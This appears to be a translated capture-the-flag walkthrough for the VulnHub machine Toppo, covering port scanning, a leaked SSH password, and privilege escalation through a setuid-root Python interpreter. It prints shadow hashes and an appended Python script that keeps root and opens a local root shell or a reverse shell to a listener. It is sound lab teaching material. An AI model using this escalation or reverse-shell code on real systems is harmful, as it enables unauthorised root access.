Continuing with my articles on hacking vulnerable VMs, today we will get root on a machine called Toppo. The process is not extremely complex, but it has its subtleties.
We download the VirtualBox image from VulnHub or from alfaexploit:
https://www.vulnhub.com/entry/toppo-1,245/
Toppo.vmdk
Let's take a look at the services on offer (a scan of the full port range, hence the 65532 closed ports):
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-03 16:46 CEST
Nmap scan report for 192.168.20.103
Host is up (0.00056s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
56149/tcp open unknown
MAC Address: 08:00:27:52:19:08 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
We run Nikto to see what it turns up:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.20.103
+ Target Hostname: 192.168.20.103
+ Target Port: 80
+ Start Time: 2018-09-03 16:48:23 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.25). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7796 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2018-09-03 16:48:32 (GMT2) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Browsing the site with Firefox we find a file called notes.txt:
Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .
The name embedded in that password suggests a user called ted, so we try it over SSH. With a bit of luck we're in:
ted@192.168.20.103's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from 192.168.0.29
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
We download linuxprivchecker and run it:
wget http://www.securitysift.com/download/linuxprivchecker.py
chmod 700 linuxprivchecker.py
python linuxprivchecker.py
[+] Shadow File (Privileged)
root:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0:17636:0:99999:7:::
ted:$6$P3kGAn0I$Yh0kqMyxQUd6wrBkWWZtlN30Xk4/UONrWecpA3D2o5OX12ZdWhdNt45KG0uiX3QlrcAgAFmoYHXbibaGEHkaK/:17777:0:99999:7:::
How is the python script able to dump the shadow file when our user cannot even read it?
cat: /etc/shadow: Permission denied
We keep digging:
lrwxrwxrwx 1 root root 9 Mar 16 2015 /usr/bin/python -> python2.7
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7
That setuid bit is the culprit. /usr/bin/python2.7 is setuid root and, going by -rwsrwxrwx, world-writable on top of that, so every python process, linuxprivchecker included, runs with an effective uid of 0; that is why the script could read /etc/shadow while cat, running as ted, could not. Once again we see how badly assigned permissions can compromise the whole system; the fix is a single chmod 0755 on the binary.
Let's try launching a shell from the python interpreter. The shell we get has lost the root effective uid (id shows no euid=0): the privilege was dropped on the way, which bash, for instance, does by design whenever euid and uid differ unless it is started with -p:
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
cat: /etc/shadow: Permission denied
Let's try a reverse connection instead; this time id reports euid=0(root):
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
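The post does not show the exact python one-liners used, so as an added example (my code, not the author's) here is the escalation written out, including the step that prevents the shell from dropping root: when python runs setuid, only the effective uid is 0, and a call to os.setresuid(0, 0, 0) makes it the real uid as well. It assumes the interpreter executing it is setuid root, as /usr/bin/python2.7 is on Toppo; the listener host and port are placeholders. It is written for Python 3, but every os call used exists in Python 2.7 on Linux too.

```python
"""Added example: a root shell from a setuid-root python interpreter.

Assumes the interpreter running this file is setuid root (Toppo's
/usr/bin/python2.7).  Not code from the original post.
"""
import os
import socket


def current_ids():
    """Return (real uid, effective uid) of this process."""
    return os.getuid(), os.geteuid()


def keep_root():
    """Turn a root *effective* uid (the setuid case) into a root real uid.

    Child processes inherit the real uid, so without this step a shell can
    decide to drop the privilege.  Returns (real uid, effective uid) after the
    call; does nothing when not running with euid 0, so it is safe to call
    from an unprivileged process as well.
    """
    ruid, euid = current_ids()
    if euid == 0 and ruid != 0:
        # Permitted because euid is 0: set real, effective and saved uid to root.
        os.setresuid(0, 0, 0)
    return current_ids()


def shell_argv(shell):
    """argv that starts SHELL without it discarding privileges.

    bash resets euid to the real uid when they differ unless started with -p,
    which is why a plain os.system("/bin/bash") from setuid python comes back
    as an unprivileged shell.  dash (/bin/sh on Debian) keeps euid as it is.
    """
    argv = [shell]
    if os.path.basename(shell) == "bash":
        argv.append("-p")
    return argv


def spawn_shell(shell="/bin/sh"):
    """Replace this process with an interactive root shell."""
    keep_root()
    os.execv(shell, shell_argv(shell) + ["-i"])


def reverse_shell(host, port):
    """Connect back to host:port and hand the socket to an interactive shell.

    host and port are assumptions: point them at your own listener
    (for example `nc -lvnp 4444` on the attacking box).
    """
    keep_root()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    for fd in (0, 1, 2):  # stdin, stdout, stderr -> socket
        os.dup2(s.fileno(), fd)
    os.execv("/bin/sh", ["/bin/sh", "-i"])


if __name__ == "__main__":
    # On the target:  /usr/bin/python2.7 suid_shell.py
    spawn_shell()
```

Running it through the setuid interpreter on the target gives a prompt where id reports uid=0 as well as euid=0, so there is no need for the -p trick afterwards; the reverse-shell variant is there for the case where the SSH session is not interactive enough for your liking.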